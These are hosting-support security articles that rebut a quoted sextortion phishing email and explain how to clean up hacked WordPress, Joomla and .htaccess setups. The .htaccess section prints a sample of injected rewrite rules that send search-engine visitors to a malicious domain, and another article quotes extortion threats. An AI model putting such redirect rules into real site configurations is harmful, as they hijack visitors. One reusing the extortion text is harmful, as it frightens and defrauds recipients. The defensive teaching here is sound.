In this article, we cover a phishing email starting with the following sentence:

on this day I hacked your OS and got full access to your account user@example.com

Such phishing emails aim to create feelings of desperation and fear. We want to combat this by ensuring you better understand how to deal with such issues.

Email users may receive this email regardless of hosting plan, content management system (CMS), email provider, spam filter, and other hosting features.

IMPORTANT: We are not security specialists. The information below may not be up-to-date best practices to combat phishing and other cyber attacks. We recommend contacting Sucuri for expert advice and a web-application firewall for better security.

Recommendations

We’re going to display the email in parts and offer recommendations for each section.

• Recommendations
  • Email
  • Router
  • Backup
  • Ransomware
  • Bitcoin
  • Payment
  • Locked
  • Security
  • Honor
  • Antivirus
• Questions

Email

I have very bad news for you.
[Date] – on this day I hacked your OS and got full access to your account [email address].
You can check it – I sent this message from your account.

So, you can change the password, yes.. But my malware intercepts it every time.

Truth: “Malware” is the abbreviation for malicious software. Scammers and bots can acquire your email address without hacking your computer or website. Is your email address on your website contact page, social media contact sections, or business card? Do you have domain privacy?

Solution:

• Remove your email account from public view, or only place it on sites that require completing reCAPTCHA to view it.
• Use a contact form, similar to security-oriented Contact Form 7 for WordPress, on your website instead to better filter spam.
• Create a different email account for administration tasks and for correspondence.
• Register your email addresses with HaveIBeenPwned.com for notifications on confirmed intrusions.
• Use a password manager and strong passwords instead of saving them within your browser. Most browsers do not encrypt saved login credentials by default.

Router

How I made it:
In the software of the router, through which you went online, was a vulnerability.
I just hacked this router and placed my malicious code on it.
When you went online, my trojan was installed on the OS of your device.

Truth: While this is possible, you should contact your internet service provider (ISP) regarding vulnerabilities and assistance enhancing your home network router. A trojan [horse] is a file that looks legitimate but includes malware.

Solution:

• Contact your internet service provider (ISP) for assistance enhancing your home network router security, firewall settings if applicable, and ensuring your router firmware is up to date.
• Run antivirus and backup solutions on your location workstation and server. All customers can contact Live Support to request an account scan. VPS and Dedicated server administrators can do this with ClamAV Scanner.
• If you’re on a VPS or Dedicating server, update your ConfigServer Security & Firewall (CSF) or Cisco hardware firewall settings (if applicable).

Interested in upgrading your server security? Check out our VPS Hosting plans and be sure to bookmark our guide on VPS Security.

Backup

After that, I made a full dump of your disk (I have all your address book, history of viewing sites, all files, phone numbers and addresses of all your contacts).

Truth: This is possible, regardless of your operating system, but a lot of factors determine its likelihood.

Solution:

• Create, and verify, backups for cPanel and local devices to an external location regularly.
• Use multi-factor authentication (MFA / 2FA) whenever possible.

Ransomware

A month ago, I wanted to lock your device and ask for a not big amount of btc to unlock.
But I looked at the sites that you regularly visit, and I was shocked by what I saw!!!
I’m talk you about sites for adults.

Truth: It is possible to capture activity between an user and website or server. This is called a man-in-the-middle (MITM) attack. This is a common issue with public Wi-Fi networks such as in airports and restuarants. This is also possible with users using Google search on a computer while logged in or an infected mobile device.

Solution:

• Navigate websites with HTTPS only, especially e-commerce sites.
• Consider using a virtual private network (VPN) for web browsing.
• Only use trusted Wi-Fi networks.

Remember, this article is meant to be primarily informative. Contact Sucuri for expert advice on how to secure your website.

Bitcoin

Pay ONLY in Bitcoins!
My BTC wallet: #########################

You do not know how to use bitcoins?
Enter a query in any search engine: “how to replenish btc wallet”.
It’s extremely easy

Truth: Don’t search that phrase. As stated in the last truth above, If anyone has access to see your network activity, searching that phrase will show someone that you’re more susceptible to future phishing attacks.

Solution: Ignore this. If you have Bitcoin, check your payment history for theft.

Payment

For this payment I give you two days (48 hours).
As soon as this letter is opened, the timer will work.

After payment, my virus and dirty screenshots with your enjoys will be self-destruct automatically.

Truth: There is no way to verify that any stolen data will be destroyed. The unfortunate truth is that if it was stolen, it has likely already been sold.

Solution: Ignore this.

Locked

If I do not receive from you the specified amount, then your device will be locked, and all your contacts will receive a screenshots with your “enjoys”.

Truth: Many cyber attacks are triggered by a specific action such as specific date, time, or user action. This type of ransomware is called a logic bomb.

Solution:

• To be safe, use AV scanners to search for malware.
• Ensure you have up-to-date cPanel and device backups.

Security

I hope you understand your situation.
– Do not try to find and destroy my virus! (All your data, files and screenshots is already uploaded to a remote server)
– Do not try to contact me (you yourself will see that this is impossible, I sent you an email from your account)
– Various security services will not help you; formatting a disk or destroying a device will not help, since your data is already on a remote server.

Truth:

• Searching for possible malware on your server and local devices is more important than worrying about what’s on a remote server.
• There may be useful information in the email header information. Live Support and our partners Sucuri can help you with this.
• Various security services, such as this article, can help you better understand how to better detect and combat phishing.

Solution:

• Ensure all software is up to date.
• Follow our guide to strengthen email authentication and mitigate email spoofing. Keep the email for a security specialist to review or delete it.
• Contact Live Support for an account scan and further security advice related to your hosting plan, installed CMS(s), Softaculous (VPS and Dedicated only), etc.
• Stay tuned for our article on how to detect phishing.

Honor

P.S. You are not my single victim. so, I guarantee you that I will not disturb you again after payment!
This is the word of honor hacker.

Truth: You are not the only person to receive this email.

Solution: Ignore the rest.

Antivirus

I also ask you to regularly update your antiviruses in the future. This way you will no longer fall into a similar situation.

Do not hold evil! I just do my job.

Truth: We request you take cybersecurity seriously. Unfortunately, software cannot completely eliminate the possibility of phishing and other cyber attacks. The best way to mitigate cyber attacks is user awareness and training.

Solution: Stay alert when browsing the web and checking your email.

Questions?

Do you have more questions? Let us know below.

Do you have questions about how to secure your CMS? Check our Support Center. Have we not covered it yet, request it below or in our Community Support Center!

This article will be updated as we cover more related topics.

Every moment your website is online, it can be preyed upon by hackers. If you have a WordPress site, you can be certain it will be targeted at some point. The question is not if attempts will be made to compromise your site, it’s when. But there’s hope! If you follow a few basic security procedures, you can make your site more resilient to the many attacks it will face over its lifetime.

In this article, you’ll learn:

• Why you must hide your WordPress version number
• How to hide your WordPress version number

Why You Must Hide Your WordPress Version Number

Your WordPress version number says more about your site than you may think. Every time WordPress makes updates or fixes bugs, the changes are notated in detailed reports. This means the general public knows which security bugs affect which version. Specifically, this means hackers know exactly what kind of attack to use on your website. This is why it’s very important to hide your version number. Any hacker can find your WordPress version by simply viewing the source code of your site in any web browser.

You may be wondering, should I just update my site automatically? Yes, updating your site whenever prompted (or even automatically) is a way to avoid possible security breaches. But, for one reason or another, updates may be skipped or ignored altogether. Either way, it’s best to hide your version number.

How To Hide Your WordPress Version Number

For this tutorial, you will use the WP Security Safe plugin. This plugin is a good choice for security because it’s very lightweight and will not slow your website down.

Please note: it’s recommended that you not install more than one security plugin on your WordPress site.

1. Log into your WordPress Dashboard
2. Click the WP Security Safe link in the left side panel
3. Choose the Privacy tab
4. Check the box for Hide WordPress Version Publicly
5. Click Save Settings at the bottom of the plugin menu

Well done! You’ve successfully hidden your WordPress version from snoopers. If you have any questions or comments feel free to leave them below.

1. Begin by logging into your WordPress admin dashboard.
2. This article assumes that you already have iThemes Security on your site. If you do not already have iThemes Security installed, you may review our article on installing iThemes Security.
3. 

   Within your WordPress admin, hover over Security on the left side menu and click on Settings.

4. 

   Next, scroll down the the Banned Users section.

5. 

   Within this section, check the box next to Default Blacklist. This will allow any IP addresses or user agents that are found within the blacklists on hackrepair.com to be automatically banned from your site.

6. Once the changes are made, be sure to click on Save All Changes.

After setting this option, many malicious sources and bots that may be increasing your website resource usage will now be permanently banned from your site. As these lists are updated regularly, using it is quite effective in automatically blocking known attack sources.

In this guide, I’ll try to cover all the Joomla security basics of making sure these problems don’t happen to you.

• Ensure Current Joomla Version is Secure
• Find and Clean Up a Joomla Hack
• Reinstall Joomla After a Hack to Prevent Further Exploits

Ensure Current Joomla Version is Secure

If you have the now very out-of-date installation of Joomla 1.5 still running on the Internet, chances are your website is getting attacked on a semi-regular basis. Unfortunately with all the known exploits for Joomla 1.5 in the wild, it’s probably just a matter of time before one of them successfully hacks your Joomla website.

Below is a table of the various versions of Joomla, and how old they are. The End of Life date marks the date in which there is no further support for bugs or security of that release making them more prone to attacks.

Find and Clean Up a Joomla Hack

If your website has been attacked and compromised sometimes it will be very apparent. You might have malicious redirects taking your visitors to some other website, content appearing on your website that you didn’t create, and typically your account’s resource usage will be higher when under attack or running any hacks.

Here are some common things you can look at if you suspect your Joomla website is under attack or hacked:

1. Check to see if the Google Safe Browsing Diagnostic page has detected any known malware running on your website. If your domain name was example.com, you would use the following URL to check: https://www.google.com/safebrowsing/diagnostic?site=example.com
   
   You can also use the Sucuri Security free website malware scanner, again access by a URL like:
   https://sitecheck.sucuri.net/results/example.com
2. Follow our recovering after a hack guide which goes over updating your cPanel and FTP passwords, and also scanning your local computer to ensure you aren’t uploading malicious files unknowingly to the server.
3. Clean up a .htaccess hack if your website is redirecting visitors or search engines to other sites without your consent.
4. Clean up a code injection attack if you notice strange behavior from your pages, or if you see injected keywords or other types of spam in your content.
5. Enable raw access logs in cPanel so that you have a historical record of your website requests, this can be handy when trying to track down malicious activity.
6. Block unwanted users with your .htaccess file to prevent possible hack attempts from known bad IP addresses or User-Agent strings.

Reinstall Joomla After a Hack to Prevent Further Exploits

While you might be able to clean up most traces of an attack and hack against your Joomla website, once an attacker has successfully exploited a part of your site, it can be extremely hard to ensure that all traces of the hack are removed.

A lot of times once a Joomla site has been hacked, it gets added to a list by the attacker, and then they’ll more than likely keep coming back trying to exploit it again and again until you’ve upgraded to protect yourself from the exploits available in the wild.

Below I’ll walk you through the process of taking a Joomla 1.5 site that has been hacked, reinstalling Joomla itself to rule out any malicious files still being on your account, and then upgrading to Joomla 2.5 to help ensure the same hack isn’t allowed to be uploaded to the website again.

1. Log into your Joomla admin to double-check you have the latest version of Joomla 1.5 already, which should be Joomla 1.5.26. If you have an older release of Joomla 1.5 you need to first upgrade from an existing Joomla 1.5x version.
   
2. Using your favorite FTP client, you’ll want to download all of your current folders and files for Joomla to your local computer. In this case, I’m using FileZilla, connecting to my site example.com, navigating to the /public_html directory where Joomla is installed, then simply selecting all the folders and files by clicking on one and then hitting Ctrl-A to select all. Then I’m dragging them all to a local folder called /Downloads/Joomla that I created.
   
3. Next, you’ll want to backup your Joomla database in cPanel, so that you have a copy of that as well. At this point, you now have all the physical files that make up your Joomla website. In the event that the steps below for reinstalling Joomla and upgrading it do not work for you, you’ll at least be able to restore your site back to its hacked state.
4. Now that you have all of your Joomla files downloaded locally that are potentially hacked, you should be able to safely remove them from the server. This can be done by simply selecting all of your Joomla files in your FTP client, and then hitting Delete on your keyboard. If your main website is running Joomla, this would be all the files in the /public_html directory.
   Please note you might have other files on your account other than just Joomla. If you delete these as well and don’t re-upload them from the local copies you’ve downloaded, they will no longer be present on your account.
5. Download the last release of Joomla 1.5 by clicking on this link for Joomla 1.5.26. You should now have a Joomla_1.5.26-Stable-Full_Package.zip archive downloaded to your local computer. This contains all of the core files needed to run a Joomla website.
6. Upload the Joomla_1.5.26-Stable-Full_Package.zip to your now what should be blank /public_html directory.
   
7. Access the FileManager in cPanel and navigate to your /public_html directory. Then right-click on the Joomla_1.5.26-Stable-Full_Package.zip file you uploaded, and click on Extract.
   
   
   In the Extract window that pops up, in this case, we can just leave the extraction directory set to /public_html and then just click on Extract File(s) so that all of the Joomla core files are placed there.
   
   
   It might take a few minutes for the .zip file to finish inflating, once it completes, click on the Close button.
   
8. At this point, if you attempt to visit your website where Joomla was installed, you will get the Joomla installation screen, since we effectively just deleted our old Joomla site, and uploaded the new Joomla core files. The next thing you’ll want to do is re-upload your configuration.php file back to the server. This file contains all of the information such as what database Joomla should use.
   
   
   You’ll also want to delete the installation folder, as this is a security requirement of Joomla.
   
9. Now if you try to go to your Joomla website again, it should have all of your content pulled from the Joomla MySQL database, but it will be now using verified as good and clean core files for Joomla. Hopefully, now any traces of a hack that you found on your account should be gone. However, if you are still seeing some strange activity, this could mean that the attacker successfully exploited your Joomla database, in which case a more thorough investigation of your database would need to be done.

Upgrade Joomla 1.5 to 2.5 to Prevent Hacks

Now that you’ve hopefully successfully removed any hacks from your old Joomla 1.5 site, it is very important to update your installation to Joomla 2.5 so that an attacker doesn’t simply come back and hack your website again.

This technically isn’t an upgrade, but a migration, as the two versions of Joomla aren’t directly compatible. The process can vary greatly depending on the complexity of your Joomla website and what modules or extensions you’ve used. We would strongly recommend at least glancing at the official Joomla documentation that they have for migrating from Joomla 1.5 to Joomla 2.5 before proceeding with the steps below.

1. You can use the jUpgrade extension which can be directly downloaded from jUpgrade downloads. You should end up with a com_jupgrade-2.5.2.zip archive of the extension.
2. Login to your Joomla admin. Then hover over Extensions and click on Install / Uninstall.
   
3. Under the Upload Package File section, click on Choose file and then browse your local computer for the com_jupgrade-2.5.2.zip file. Then click on Upload files & Install.
   
4. Hover over Extensions again, and this time click on Plugin Manager.
   
5. In the Filter field, type in mootools and click Go. Beside the System – Mootools Upgrade plugin, click on the red x under the Enabled column to enable the plugin.
   
6. Hover over Components, then click on jUpgrade.
   
7. Now just click on the big Start Upgrade button to begin the process.
   
   
   You should see the jUpgrade upgrade begin and it will update you on the current step in the process. When complete you’ll get a Joomla 2.5 Upgrade Finished! message.
8. Now if you visit your website with /jupgrade appended to the end, you should see your upgraded Joomla site. jUpgrade leaves your main Joomla 1.5 site still intact so you can test things. Here you can see on my example.com site when accessing the /jupgrade directory the Main Menu for instance has changed.
   
9. Now in your FTP client again, create a new folder called old_joomla. This can be done by right-clicking on the server-side of files and selecting Create directory, in the Create directory pop-up enter the name of the directory then click OK.
   
   
   Next, click on any of the files or folders, and then hit Ctrl-A to select all the files. Then hit just Ctrl and click on the newly created old_joomla directory to de-select it, and also the jupgrade folder. Then finally drag all of the other selected files into the old_joomla directory.
   
10. Now navigate into the jupgrade folder, hit Ctrl-A to select all files, then drag them up into the /public_html directory one level up.
    
11. Now you should see the Joomla 2.5 website when just accessing your domain normally, and if you login to the Joomla admin, you’ll notice the new version reflected as well.

    

Hopefully, you now have a good idea of how to ensure your Joomla website isn’t currently hacked, and if it was how to clean up the hack or reinstall Joomla. Make sure going forward you always keep your Joomla install updated to prevent any further issues, and as always if you’re still having any issues please leave us a comment!

What is a malicious user?

Your website is open to anyone on the Internet, with this availability to the world it also brings along with it certain risks, one of those being a user that just wants to be malicious and try to cause problems for others.

Typically when malicious activity is going on, it usually happens in bulk, and this can make the server have to work extra hard. Because of this it’s important to identify and stop so that the activities of a few malicious users don’t ruin the experience for all of your other users.

The most commons activities for a malicious user would be spamming or trying to hack into your website. You can read about stopping brute force and spam attacks or dealing with spam in your posts and comments for ways to help limit these types of malicious activity.

Hacked website

A hacked website can easily lead to a lot of extra resource usage on your account, as a hacked website will typically try to do multiple things for each page load on top of what your normal website already does. Hacking activity is usually automated as well, and this typically also leads to a higher amount of resource usage to handle the flood of requests.

If your website has already been hacked, then you might also like to learn about cleaning up a .htaccess hack or clean up a code injection attack which are common ways hackers will try to re-direct traffic from your site.

If you have a WordPress site you could also learn how to reinstall WordPress after a hack to make sure you’ve removed all traces of the break in. If you just have a lot of comment spam then you could read about WordPress comment spam clean up to help with that.

Blocking access to website

When your account has to deal with activity from malicious users it can cause resource usage problems, and in extreme cases even lead to an account suspension.

You can learn how to block unwanted users from your site using .htaccess to limit certain users from accessing your site at all. If you have one website that is causing problems you could also try to disable the problematic site for troubleshooting so it doesn’t cause problems for the rest of your websites while trying to track down the problem.

You should now have a better understanding oh what a malicious user is, and how the activity from a malicious user or hack could cause excessive resource usage on your account.

Sometimes you might catch down in your web-browser’s status bar that a foreign website is attempting to load content on your website, or you might notice a web-browser warning. These can be common signs of a .htaccess hack, you might also notice that you’ve fallen in search engine rankings. The typical reason for this is that hackers will attempt to hack your .htaccess file so that when search engine bots crawl your website they are redirected to the website that the hacker has put in place instead of your own.

You can do a quick outside spot check using Google’s Safe Browsing diagnostic page to see if they’ve detected anything malicious on your site in their most recent crawl. You would simply want to replace example.com with your actual domain name in the following URL:

You can also read more about the Google Safe Browsing page.

Following the steps below you can learn how to check your .htaccess file for hacks, and how to clean them up if you do find any.

.htaccess hacked clean up steps

  

 

  

 

1. You might have a text editor encoding dialog box pop-up, you can simply click on Edit.
2. Scroll up and down the document and you’ll want to look for any code that seems to be out of place, more than likely you’ll see something along the following lines if your .htaccess file has been hacked:

   RewriteEngine On

   RewriteOptions inherit

   RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]

   RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]

   RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]

   RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]

   RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]

   RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]

   RewriteRule .* https://MaliciousDomain.tld/bad.php?t=3 [R,L]
   What this rewrite code is attempting to do is checking for the referrer of a request, if it’s a popular search engine they are redirecting it to their MaliciousDomain.tld website and trying to load the bad.php malicious script.

   Because these RewriteCond conditional statements wouldn’t match for yourself, and only for search engine bots, sometimes these types of hacks can go unnoticed for some time. Unfortunately the longer they’re active the more potential it has at affecting your search engine ranking.

3. To remove these malicious rewrites you can simply highlight all of the text and hit Delete on your keyboard and then click on Save Changesat the top-right to save the file.If you aren’t 100% confident that you’ve found malicious redirect code, we would recommend backing up your .htaccess file prior to making edits to it. This can be accomplished by simply right-clicking on the .htaccess file in the File Manager, selecting Copy and then choosing a copy path such as /public_html/.htaccess-BAK, then finally clicking on Copy File(s).

You should now understand how to locate and remove a .htaccess hack that could be causing your website to do a malicious redirection. You’ll more than likely also want to read about steps to take after a hack for more information on how to prevent hacks like this from taking place.

If you’re on a VPS or dedicated server you might also wish to read about how to clean up a code injection attack if more than just your .htaccess file has been hacked.

A lot of the time a hacker will inject malicious code in your PHP scripts that can make it very hard to clean up manually after the injections took place. In some cases this might require our system administration department to quarantine your entire WordPress site outside of your public_html directory, so that we can ensure further hacks aren’t taking place and further damage isn’t done to your WordPress database.

If you happen to have read our previous article on how to clean up a code injection attack, the steps mentioned in that article might allow you to clean up any injections that have taken place to get your site back online.

In the steps below we’ll walk through an example site’s PrimaryDomain.com that has been maliciously injected to the point where it’s not going to be easy to remove all the malicious code and ensure we’ve caught all of it. So in this case we’re simply going to reinstall WordPress and then link up the new install with our old database.

Reinstalling WordPress after a Hack

1. First you’ll want to download the latest version of WordPress to your local computer.
2. Extract the files in the .zip archive you downloaded to a local folder.
3. 

   Using FTP, upload all of the folders and files contained within the wordpress directory to your public_html directory. Or if your domain was an addon domain and its document root was in a sub-directory make sure you’re uploading it there. You can do this by hitting Ctrl-A in your FTP client when you’re in the left-hand pane to select all the files, then simply drag them onto the server.

4. 

   Once the files are done uploading, navigate to the quarantine directory on the server side, right-click on wp-config.php and choose View/Edit. Your FTP application should prompt you for what application you’d like to open the file with, you can just use a text editor such as Notepad. Then finally copy down the database information from the define(‘DB_…) sections.

5. 

   At this point if you try to simply access the site you’ll get a WordPress error about no wp-config.php file.

6. 

   Back in your FTP client, navigate to your public_html directory and you should see a file called wp-config-sample.php, right-click on this file and choose View/Edit, open the file in Notepad then fill in your database name, database user, and database user password.

   Then hit Ctrl-S to save the file, in a few seconds your FTP client should prompt you if you’d like to save this back to the server, click Yes. You can also place a check beside Finish editing and delete local file if your FTP client gives you that option.

7. Now in your FTP client right-click on wp-config-sample.php choose Rename, and then name the file just wp-config.php.
8. 

   Now in this case if we try to go to our site again it’s an all blank page, the reason for this is because our site used a custom theme, and those theme files are still quarantined. So next in your FTP client navigate to the /quarantine/wp-content/themes directory, and drag over the pinboard directory (or whichever theme you used) to your local computer.

   Prior to copying your quarantined theme’s files back to the server, you should scan them for a virus/malware, or preferably re-download a fresh copy of your theme from the developer to ensure no malicious files have been placed inside your theme’s folders.
9. 

   Now navigate on the server side to the /public_html/wp-content/themes directory, and then drag the pinboard directory from the local computer to the server.

10. 

    You should now be able to hopefully pull up your website again free of any malicious hacks.

Depending on the complexity of your WordPress site, you might want to also go in and reinstall any plugins that you had setup to get your site fully functional again. These steps above should at least get you to the point where you can start logging back into your WordPress administration panel again, and get your site back online for your visitors.

Note: If you already know you have been hacked, please see our article on recovering from a hack.

How Can I Tell if My Website Has Been Hacked?

Some hacks are quite apparent since they deface your page, while others are more subtle. Here are some common signs that your website has been compromised:

• Your home page has changed. If you visit your website, and instead of seeing the page you have created you see something entirely different it’s likely that your page has been “defaced.” Normally, these types of hackers will have a “hacked by…” message displaying to take credit for the hack.
• Your access to admin pages no longer exists. If you cannot access your admin section of your website, it’s possible the hacker has gained access to the administrator account or cPanel and altered the passwords.
• You get a red Google Warning page. This is an indication that Google has scanned your website, and one of the Google bots has found some code that is known to be malicious. If this is the case, Google will display a red warning page.
• Your computer’s anti-virus software warns you when you visit your website. This is a typical situation where your website is trying to install a trojan or another type of virus on your local computer.
• A page will not load but it used to. If you haven’t changed anything on your website and it is now not loading this could be a sign of a hack. This is not a typical hack but usually indicates that the hacker has modified a database so it no longer functions as it should.

How Was My Website Hacked?

The most common methods of hacking a website are:

• Compromised Password to:
  • cPanel
  • Website or CMS Software
  • FTP
• Code Injection
• Remote File Inclusion
• Outdated Website Software, such as:
  • Plugins
  • Addons
  • Themes

If you password has been hacked or compromised, this will typically be a defacement type of hack. If you use a content management system, the hack was usually done be exploiting the software. It is important when you use CMS software such as Joomla, WordPress, and OSCommerce to keep the software up to date.

How Can I Fix My hacked Website?

Each hack is different so it is extremely difficult to suggest an exact method to resolve a hacked site. Here are some general methods to fixing a hacked website:

• Change your passwords to your account. This is the best practice for any hack. This is the quickest way to limit the access to the website. By doing this, you can limit the access to your account. You should change your WordPress, FTP, and cPanel passwords.
• Update all programs used on your hosting account. If you use a third party shopping cart or CMS it’s important to keep that software up to date. This is because most updates are used to secure the actual software. As vulnerabilites are found the patches are released.
• Update software on your local computer. Some programs such as Flash, have vulnerabilites that allow hacked to access data on your computer. We’ve seen some hacks even designed to search around for saved FTP credentials.
• Run a malware or virus scan on your local machine. It is possible that you have picked up a piece of malware or virus that is copying your passwords.

For more information on fixing a hack, please see our article on recovering from a hack. Please see our Website Security article for more information on protecting your website.

Keeping your server secure is a full time job for any support staff. But that shouldn’t be the only focus. Read more about what makes InMotion one of the top hosting companies out there.